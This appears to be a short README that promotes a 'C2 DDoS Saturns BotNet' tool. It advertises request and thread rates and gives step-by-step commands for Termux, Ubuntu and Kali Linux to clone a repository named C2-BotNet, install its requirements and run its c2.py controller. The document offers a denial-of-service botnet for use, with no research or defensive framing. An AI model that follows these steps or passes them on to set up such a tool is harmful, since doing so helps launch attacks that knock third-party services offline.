C2 DDoS Saturns BotNet


Capture du


Install Steps

HOW TO INSNTALL

! WATCH THIS !

[The Best Option]


➡️ Bytes/s | 250 - 410 | = Req 55k+| [Verified]

➡️ Threads | 250 - 420 | = Req 50k+| [Verified]


-=Termux=-

1. pkg update && pkg upgrade
2. pkg install curl
3. pkg install python3
4. pkg install git
5. git clone https://github.com/bunthyjava/C2-BotNet.git
6. cd C2-BotNet
7. pip3 install -r requirements.txt
8. python3 c2.py

-= Ubuntu =-

1. sudo apt-get update && sudo apt-get updgrade
2. sudo apt install python3
3. sudo apt install python3-pip
4. sudo apt install curl
5. sudo apt install git
6. git clone https://github.com/bunthyjava/C2-BotNet.git
7. cd C2-BotNet
8. pip3 install -r requirements.txt
9. python3 c2.py

-= Kali Linux =-

1. apt update && apt upgrade
2. apt install curl
3. apt install python3
4. apt install python3-pip
5. apt install git
6. git clone https://github.com/bunthyjava/C2-BotNet.git
7. cd C2-BotNet
8. pip3 install -r requirements.txt
9. python3 c2.py